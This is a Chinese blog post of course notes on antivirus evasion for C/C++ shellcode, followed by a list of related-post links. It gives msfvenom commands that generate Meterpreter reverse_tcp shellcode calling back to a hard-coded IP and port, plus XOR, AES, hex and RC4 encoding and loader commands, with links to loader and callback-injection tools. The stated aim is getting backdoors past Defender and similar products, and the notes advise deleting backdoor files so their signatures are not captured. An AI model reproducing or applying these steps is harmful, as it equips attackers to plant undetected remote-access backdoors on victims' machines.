第107-免殺對抗-C&C++&溯源ShellCode上線&混淆變異演算法&回撥編譯執行

dummy6acker發表於2024-10-12

知識點

#知識點：

1、ShellCode-分析&朔源&感知
2、ShellCode-混淆&編碼&演算法
3、回撥執行解析-API&彙編&控制代碼

#章節點：

編譯程式碼面-ShellCode-混淆
編譯程式碼面-編輯執行器-編寫
編譯程式碼面-分離載入器-編寫
程式檔案面-特徵碼定位-修改
程式檔案面-加殼花指令-資源
程式碼載入面-Dll反射劫持-載入
許可權邏輯面-防毒程序干擾-結束
工具資料面-通訊記憶體流量-動態

對抗目標：
X60 Defender 某絨管家 VT等

程式語言：
C/C++ Python C# Go Powershell Ruby Java ASM等

涉及技術：
ShellCode混淆加密，無檔案落地，分離拆分，白名單，DLL載入，Syscall，加殼加花，
資源修改，特徵修改，二次開發CS，記憶體休眠，程序注入，反沙盒，反除錯，CDN解析等

演示案例

1、C/C++-ShellCode分析-OD&IDA&朔源

2、C/C++-ShellCode變異-編碼混淆加密演算法

3、C/C++-回撥執行程式碼-彙編&控制代碼&API&UI等

#C/C++-ShellCode分析-OD&IDA&朔源

1、EXE朔源-IP及埠-防毒分析
2、編譯修改-IP及埠-威脅感知
reverse_tcp.asm
https://www.cnblogs.com/Akkuman/p/12859091.html
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb

#C/C++-ShellCode變異-編碼混淆加密演算法

Xor Aes Hex Rc4 Rsa等
https://github.com/Arno0x/ShellcodeWrapper

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw

1、python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi xor
CS&MSF
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw
python xor.py -s shellcode.bin -d payload.c -n 10 -r out.bin

2、python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi aes

3、Hex
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
https://gchq.github.io/CyberChef/
https://github.com/ByPassAVTeam/ShellcodeLoader
LoaderMaker.exe download.dat(hex資料) xiaodi.exe(生成檔名)

4、Rc4
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
https://blog.csdn.net/weixin_45590789/article/details/105536623

#C/C++-回撥執行程式碼-彙編&控制代碼&API&UI等

Callback_Shellcode_Injection-main
https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection

總結

今天主要講的是shellcode混淆免殺：
1、首先明確為什麼不對exe型別做手腳，而是對shellcode做手腳？
因為對exe型別做手腳（如加殼）可以免殺，但是可能導致出錯，無法上線。
而對shellcode進行操作，再編譯打包成exe，一般不會有這種問題。
2、殺軟如何檢測到病毒的？
一般是透過逆向分析後門檔案，匹配病毒特徵檢測到的。
3、如何用shellcode實現免殺？
今天講的是使用加密演算法（如XOR、AES、Hex、RC4）對shellcode進行加密混淆，然後解密傳入，實現免殺。
4、為什麼msf或cs上線了，但是一會兒又掉線了，且IP很奇怪？
可能是對方殺軟將後門放在雲沙箱裡執行了。
5、注意事項：實驗完後記得清除後門檔案，不然容易被殺軟捕獲特徵，下一次可能無法免殺了。

shellcode 免殺(一)
2020-06-19
第109天：免殺對抗-PowerShell&混淆&分離載入&特徵修改&EXE生成&填充替換
2024-10-12
特徵
第108天：免殺對抗-Python&混淆演算法&反序列化&打包生成器&Py2exe&Nuitka
2024-10-12
Python演算法UI
第110天：免殺對抗-GO&C#&反VT沙盒&逆向除錯&引數載入&資源分離&混淆加密
2024-10-12
GoC#除錯加密
【原創】ShellCode免殺的騷姿勢
2022-05-05
使用msf生成shellcode並用Go免殺？
2023-04-02
Go
【免殺篇】遠控免殺專題(32)-Go載入shellcode免殺-3種方式(VT免殺率7-70)
2021-10-26
Go
使用C編譯器編寫shellcode
2013-12-06
編譯
Android Proguard混淆對抗之我見
2022-06-01
Android
回撥蛋糕 —— cake下順序執行命令
2014-02-26
漫談幾種反編譯對抗技術
2017-11-09
編譯
delphi中回撥函式差異
2010-10-28
函式
AVAssetExportSession的exportAsynchronouslyWithCompletionHandler:回撥不執行的原因
2016-08-30
ExportSession
safari 回撥中window.open無法執行
2016-03-16
.NET 編譯執行or解釋執行？
2012-12-31
編譯
執行緒回撥函式形參不能用引用
2020-11-03
執行緒函式
vim編譯執行c
2016-12-05
編譯
[譯] JavaScript：回撥是什麼鬼？
2019-03-04
JavaScript
[譯] React 元件中繫結回撥
2016-08-01
React元件
異常-編譯期異常和執行期異常的區別
2018-09-02
編譯
python程式碼混淆與編譯
2024-08-08
Python編譯
走進Task（2）：Task 的回撥執行與 await
2022-02-19
AI
網頁遊戲的編譯執行
2014-04-15
網頁遊戲編譯
shellcode編寫
2022-05-24
在Mac上用自己編譯出的DNX執行.NET程式
2015-05-29
Mac編譯
多執行緒應用–Http請求阻塞回撥處理
2019-01-15
執行緒HTTP
多執行緒應用--Http請求阻塞回撥處理
2018-09-05
執行緒HTTP
從《黎明殺機》看非對稱對抗遊戲的魅力
2020-01-16
遊戲
Android反編譯和程式碼混淆
2016-07-08
Android編譯
【譯】非同步JavaScript的演變史：從回撥到Promises再到Async/Await
2018-12-20
非同步JavaScriptPromiseAI
0909 編譯原理第1次上機
2015-09-09
編譯原理
oracle回滾溯源
2022-11-11
Oracle
C程式從編譯到執行
2021-06-25
C程式編譯
PHP編譯，執行make報錯
2017-11-27
PHP編譯
ubuntu編譯執行xv6
2015-01-18
Ubuntu編譯
Java編譯和執行的命令
2024-08-02
Java編譯
回撥地獄-編寫非同步JavaScript指南
2019-02-16
非同步JavaScript
關於onPostCreate——Activity徹底執行起來之後的回撥
2016-12-20